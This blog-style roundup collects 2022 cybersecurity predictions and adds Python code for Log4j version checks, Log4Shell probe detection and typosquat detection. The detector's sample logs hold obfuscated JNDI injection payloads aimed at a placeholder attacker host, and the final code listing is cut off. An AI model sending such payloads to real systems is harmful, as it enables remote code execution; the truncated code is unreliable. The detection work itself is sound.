Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development, and investment. Advanced 5G and wireless networks will bring higher traffic capacities, lower latency, and increased reliability, and enable processing and analytics in real time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
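The Google figure above is a dependency-inventory problem: you cannot patch what you have not found. As an added example (my own code, not from the SecurityWeek or Google articles), here is a small Python check that reads `mvn dependency:tree` output and reports which of the Log4j CVEs listed above each `log4j-core` version is still exposed to. The fixed-version table follows the Apache Log4j security page, including the backports for the 2.12.x (Java 7) and 2.3.x (Java 6) branches; the sample dependency tree is constructed for the example and does not come from any real project.

```python
import re
from typing import Dict, Iterable, List, Tuple

# First fixed version of log4j-core per CVE and per release branch, as published on
# the Apache Log4j security page. The 2.12.x (Java 7) and 2.3.x (Java 6) branches
# received backported fixes; every other 2.x version follows the "main" line.
FIXED: Dict[str, Dict[str, str]] = {
    "CVE-2021-44228": {"main": "2.15.0", "2.12": "2.12.2", "2.3": "2.3.1"},
    "CVE-2021-45046": {"main": "2.16.0", "2.12": "2.12.2", "2.3": "2.3.1"},
    "CVE-2021-45105": {"main": "2.17.0", "2.12": "2.12.3", "2.3": "2.3.1"},
    "CVE-2021-44832": {"main": "2.17.1", "2.12": "2.12.4", "2.3": "2.3.2"},
}

# Matches the artifact lines printed by `mvn dependency:tree`, e.g.
# "[INFO] +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile"
LOG4J_CORE = re.compile(r"org\.apache\.logging\.log4j:log4j-core:(?:jar|bundle):([0-9A-Za-z.\-]+)")


def parse_version(v: str) -> Tuple[int, int, int, int]:
    """'2.14.1' -> (2, 14, 1, 1). A pre-release such as '2.0-beta9' gets a trailing 0
    so that it sorts below the final release carrying the same number."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?", v)
    if not m:
        raise ValueError(f"unrecognised log4j version: {v}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def affected_cves(version: str) -> List[str]:
    """CVEs from the table above that the given log4j-core version is still exposed to."""
    ver = parse_version(version)
    if ver[0] != 2:
        return []  # log4j 1.x is a separate, end-of-life code base and is not covered here
    branch = {(2, 12): "2.12", (2, 3): "2.3"}.get(ver[:2], "main")
    return [cve for cve, fixes in FIXED.items() if ver < parse_version(fixes[branch])]


def scan_dependency_tree(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Map every log4j-core version found in dependency:tree output to its open CVEs."""
    findings: Dict[str, List[str]] = {}
    for line in lines:
        m = LOG4J_CORE.search(line)
        if m:
            findings.setdefault(m.group(1), affected_cves(m.group(1)))
    return findings


# Constructed sample of `mvn dependency:tree` output (not taken from any real project).
SAMPLE_TREE = """\
[INFO] --- maven-dependency-plugin:3.1.2:tree (default-cli) @ shop-backend ---
[INFO] com.example:shop-backend:jar:1.0.0
[INFO] +- org.springframework.boot:spring-boot-starter-log4j2:jar:2.5.6:compile
[INFO] |  +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] |  \\- org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
[INFO] \\- com.example:legacy-tool:jar:3.2.0:test
[INFO]    \\- org.apache.logging.log4j:log4j-core:jar:2.17.1:test
""".splitlines()

if __name__ == "__main__":
    for version, cves in scan_dependency_tree(SAMPLE_TREE).items():
        print(f"log4j-core {version}: {', '.join(cves) or 'no known open CVE'}")
```

Two caveats a practitioner will hit in practice: this only sees versions Maven declares, so a `log4j-core` copied or shaded into a fat jar needs a scan of the jar contents as well, and the version Maven resolves can differ from what a container image actually ships, so run the check against the built artifact, not just the `pom.xml`.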
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
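The "large number of exploit variations" Akamai mentions is mostly obfuscation of the same `${jndi:...}` lookup, which is why a naive string match misses so much. As an added example (my own code, not Akamai's), here is a detector that unwraps the nested-lookup tricks seen in the wild (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`, URL-encoding) before matching, run over constructed Apache-style access log lines. The normalizer is a detection-side approximation of Log4j's lookup resolution, not a reimplementation of it, and `attacker.example` is a placeholder host.

```python
import re
from urllib.parse import unquote
from typing import List, Tuple

# Innermost ${...} lookup, i.e. one whose body contains no further $, { or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize_lookups(s: str, max_rounds: int = 64) -> str:
    """Unwrap nested Log4j lookup syntax from the inside out, far enough for detection.

    Handles ${lower:x} / ${upper:x}, the default-value trick (${::-j}, ${env:NOPE:-j})
    and arbitrary nesting of those. Stops as soon as a jndi: lookup surfaces.
    """
    for _ in range(max_rounds):
        m = INNERMOST.search(s)
        if m is None:
            break
        inner = m.group(1)
        key = inner.lower()
        if key.startswith("jndi:"):
            break                                  # surfaced: nothing more to unwrap
        if ":-" in inner:                          # ${anything:-default} -> default
            repl = inner.rsplit(":-", 1)[1]
        elif key.startswith("lower:"):
            repl = inner.split(":", 1)[1].lower()
        elif key.startswith("upper:"):
            repl = inner.split(":", 1)[1].upper()
        else:
            repl = inner                           # unknown lookup: keep its text visible
        s = s[:m.start()] + repl + s[m.end():]
    return s


def find_jndi_probes(log_lines) -> List[Tuple[int, str]]:
    """Return (line number, normalized payload) for every line carrying a jndi lookup."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        decoded = unquote(unquote(line))  # access logs often hold (sometimes doubly) URL-encoded payloads
        norm = normalize_lookups(decoded)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            hits.append((n, norm[m.start():] if end == -1 else norm[m.start():end + 1]))
    return hits


# Constructed Apache-style access log lines; attacker.example is a placeholder host.
SAMPLE_ACCESS_LOG = [
    '203.0.113.9 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:01:04 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap'
    '%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:01:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, payload in find_jndi_probes(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {payload}")
```

Because the probe can arrive in any header or parameter that ends up in a log statement, the useful place to run this is the full request log (or a WAF/proxy log), not just the User-Agent field, and a hit should be paired with egress data: an outbound LDAP, RMI or DNS request from the application host shortly after the probe is the difference between an attempt and a successful callback.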
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product,” points out, constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics: 1. Malware, 2. Mobile, 3. Machine Learning and AI, 4. Ransomware (because we simply couldn’t not give it a section of its own), and 5. Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities.
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Mobile phone security is being reworked
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Cyber attacks already threaten goods deliveries too
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime, extending it from technically savvy individuals and criminal organizations to everyone. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll warns of a “cyber pandemic”: an internet disruption could throw the world into chaos again
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnéll says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Cyber attacks are accelerating, but companies can respond to them
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat extortion
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Extended Detection and Response (XDR) model to detect attacks on large networks
Trend Micro report: in the future everything is at risk
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
Tomi Engdahl says:
You’ve still not patched it? Hackers are using these old software flaws to deliver ransomware https://www.zdnet.com/article/youve-still-not-patched-it-hackers-are-using-these-old-software-flaws-to-deliver-ransomware/
Log4j has dominated recent discussions around cybersecurity vulnerabilities, but the emergence of the Java logging library security flaw has allowed several other major exploits abused by cyber criminals to fly under the radar, potentially putting many organisations at risk from ransomware and other cyberattacks. But cybersecurity researchers at Digital Shadows have detailed several other vulnerabilities that appeared last year or that are even older and continue to be left unpatched and exploited, which may have been missed and continue to provide opportunities for cyber criminals.
Tomi Engdahl says:
Police give a good tip for fending off online scams: a simple but effective trick
https://www.tivi.fi/uutiset/tv/4c3953e0-b4bd-442e-a37d-b6ecbfae4a03
The police reported on an investigation into an extensive series of frauds. The suspected offences took place on an online marketplace during last autumn. The police website gave a tip on how to reduce the chance of fraud when buying something online.
You can ask the seller to send a photo that shows, in addition to the item for sale, the current date written on a piece of paper. This reduces the misuse of images merely picked from the internet.
Tomi Engdahl says:
Senate lawmakers try again on cyber incident reporting legislation https://therecord.media/senate-lawmakers-try-again-on-cyber-incident-reporting-legislation/
The leaders of the Senate Homeland Security Committee on Tuesday introduced a legislative package meant to boost U.S. cybersecurity, warning a possible Russian invasion of Ukraine could result in cyberattacks against the U.S. by Moscow or its proxies. The proposed legislation, dubbed the Strengthening American Cybersecurity Act, combines three bills Senate Homeland Chair Gary Peters (D-Mich.) and ranking member Rob Portman (R-Ohio) advanced out of their committee, including a measure that would require critical infrastructure firms to notify the Homeland Security Department when they are breached.
Tomi Engdahl says:
Poland Launches Cybersecurity Military Unit
https://www.securityweek.com/poland-launches-cybersecurity-military-unit
Poland’s defense minister on Tuesday appointed an army general to head a new Cyber Defense Force to officially launch the unit’s operation.
Defense Minister Mariusz Blaszczak said the force’s mission includes defense, reconnaissance and, if need be, offensive actions to protect Poland’s Armed Forces from cyberattacks.
“We are perfectly aware that in the 21st century cyberattacks have become one of the tools of aggressive politics, also used by our neighbour,” Blaszczak said, apparently referring to Russia. “For that reason these capabilities are of fundamental, key nature to Poland’s Armed Forces.”
Blaszczak appointed Brig. Gen. Karol Molenda to head the unit, which will cooperate closely with the National Center for Cyber Security, initiated in 2019.
Poland’s state offices and companies occasionally fall victim to hacking.
Last year, emails were apparently leaked from the private box of Michal Dworczyk, the head of Prime Minister Mateusz Morawiecki’s office, and made available on the internet, presenting some government officials and decisions in negative light. Dworczyk denies they are authentic, but circumstances indicate at least some are.
Tomi Engdahl says:
When It Comes To Tech, China Is Just As Wary Of The U.S. As U.S. Is Wary Of China
https://www.forbes.com/sites/rashishrivastava/2022/02/08/when-it-comes-to-tech-china-is-just-as-wary-of-the-us-as-us-is-wary-of-china/?sh=2bec2a2857c3
Tomi Engdahl says:
Financial sector preparedness is in good shape https://www.huoltovarmuuskeskus.fi/a/finanssialan-varautuminen-hyvalla-tolalla
Finnish banks and financial sector authorities performed well in the autumn FATO exercise. Based on the results of the exercise, the financial sector has improved its preparedness for various threats.
Room for development was still found, for example in cooperation and communication. Threats to banking include various cyber attacks and economic crises. Banks are central to the functioning of the whole of society, among other things because they handle payment traffic, and their crisis preparedness must be continuously strengthened.
Tomi Engdahl says:
CISA and SAP warn about major vulnerability https://therecord.media/cisa-and-sap-warn-about-major-vulnerability/
German enterprise software maker SAP and the US Cybersecurity and Infrastructure Security Agency have issued security advisories on Tuesday to warn SAP customers to install the company’s February security patches as soon as possible in order to prevent the exploitation of a major vulnerability in a ubiquitous SAP component.
Tracked as CVE-2022-22536, the vulnerability was discovered by cloud security firm Onapsis and impacts the SAP Internet Communication Manager (ICM). Also:
https://www.bleepingcomputer.com/news/security/cisa-warns-admins-to-patch-maximum-severity-sap-vulnerability/
https://www.zdnet.com/article/sap-releases-patches-for-icmad-vulnerabilities/
Tomi Engdahl says:
2021 Trends Show Increased Globalized Threat of Ransomware https://www.cisa.gov/uscert/ncas/alerts/aa22-040a
In 2021, cybersecurity authorities in the United States, Australia, and the United Kingdom observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) observed incidents involving ransomware against 14 of the 16 U.S. critical infrastructure sectors, including the Defense Industrial Base, Emergency Services, Food and Agriculture, Government Facilities, and Information Technology Sectors. Ransomware tactics and techniques continued to evolve in 2021, which demonstrates ransomware threat actors’ growing technological sophistication and an increased ransomware threat to organizations globally.
Tomi Engdahl says:
Online extortionists are often paid over $500,000: this large a share of big companies pay the ransom
https://www.tivi.fi/uutiset/tv/9deb1939-81cb-4f6a-95b7-ff086b54f2a2
Of the professionals working on critical infrastructure security at large companies, 80 percent answered in a recent survey that they have encountered ransomware at work, Venture Beat reports. 60 percent said that ransoms had also been paid, and that in half of the cases the sum was over $500,000. Roughly 80 percent also said that their company’s cybersecurity budget has been raised since 2020. The security side suffers from a skills shortage, as 90 percent would immediately hire more people to ensure business continuity.
Tomi Engdahl says:
Cybersecurity threats are always changing: staying on top of them is vital, getting ahead of them is paramount https://www.microsoft.com/security/blog/2022/02/09/cybersecurity-threats-are-always-changing-staying-on-top-of-them-is-vital-getting-ahead-of-them-is-paramount/
With a 1,070 percent increase in ransomware attacks year-over-year between July 2020 and June 2021, staying on top of attack trends, such as ransomware and supply chain threats, is more important than ever. To successfully detect and defend against security threats, we need to come together as a community and share our expertise, research, intelligence, and insights. Microsoft Security Insider is a site for business leaders focused on cybersecurity to get the latest news, insights, threat intelligence, and perspectives on top-of-mind topics in cybersecurity.
Tomi Engdahl says:
Spam and phishing in 2021
https://securelist.com/spam-and-phishing-in-2021/105713/
The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their investment projects look as alluring as possible.
Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That’s how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later.
Tomi Engdahl says:
How to Detect and Defend Against Domain Abuse https://www.recordedfuture.com/how-to-detect-and-defend-against-domain-abuse/
Picture this: A threat actor acquires a stolen list of your customers’ email addresses via a dark web forum. The actor then registers a typosquat domain, similar to your own. They use your logos and design to make the site look as authentic as possible. Then, they email this phishing site directly to your customers, and trick them into giving up their credit card information. Your customers are justifiably angry. They blame you for their lost money, time, and expenses related to identity monitoring. Even though it’s not your fault, you’ve lost their trust, and gaining it back will be both difficult and expensive.
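The typosquat scenario in the Recorded Future piece is detectable before the phishing mail goes out, because the lookalike domain has to be registered (and usually gets a TLS certificate) first. As an added example, not from the article, here is my own Python sketch of the matching side: it generates the lookalike variants of a brand domain (omissions, transpositions, vowel swaps, homoglyphs, hyphenation, common prefixes and suffixes, TLD swaps) and compares a feed of newly observed domains against them, falling back to a brand-substring check and a small edit distance. The homoglyph table is deliberately short, and the `OBSERVED` feed is constructed for the example rather than taken from any real registration data.

```python
from typing import Iterable, List, Set, Tuple

# Visually confusable substitutions seen in lookalike registrations (a deliberately short table).
HOMOGLYPHS = {"l": ["1", "i"], "i": ["1", "l"], "o": ["0"], "e": ["3"], "a": ["4"],
              "s": ["5"], "m": ["rn"], "w": ["vv"]}
VOWELS = "aeiou"
ALT_TLDS = ["com", "net", "org", "co", "info", "io"]
AFFIXES = ("secure-", "login-", "my", "-login", "-secure", "-support")


def typosquat_names(name: str) -> Set[str]:
    """Second-level-label variants of `name` (no TLD)."""
    out: Set[str] = set()
    for i, ch in enumerate(name):
        out.add(name[:i] + name[i + 1:])                         # omission:      exmple
        out.add(name[:i] + ch + name[i:])                        # repetition:    exxample
        if i + 1 < len(name):
            out.add(name[:i] + name[i + 1] + ch + name[i + 2:])  # transposition: exmaple
        if ch in VOWELS:
            out.update(name[:i] + v + name[i + 1:] for v in VOWELS if v != ch)
        out.update(name[:i] + g + name[i + 1:] for g in HOMOGLYPHS.get(ch, []))
        if i > 0:
            out.add(name[:i] + "-" + name[i:])                   # hyphenation:   ex-ample
    for a in AFFIXES:
        out.add(name + a if a.startswith("-") else a + name)     # example-login, myexample
    out.discard(name)
    return out


def typosquat_candidates(domain: str) -> Set[str]:
    """Full lookalike domains for a brand domain such as 'example.com'."""
    name, _, tld = domain.lower().rpartition(".")
    cands = {f"{n}.{tld}" for n in typosquat_names(name)}
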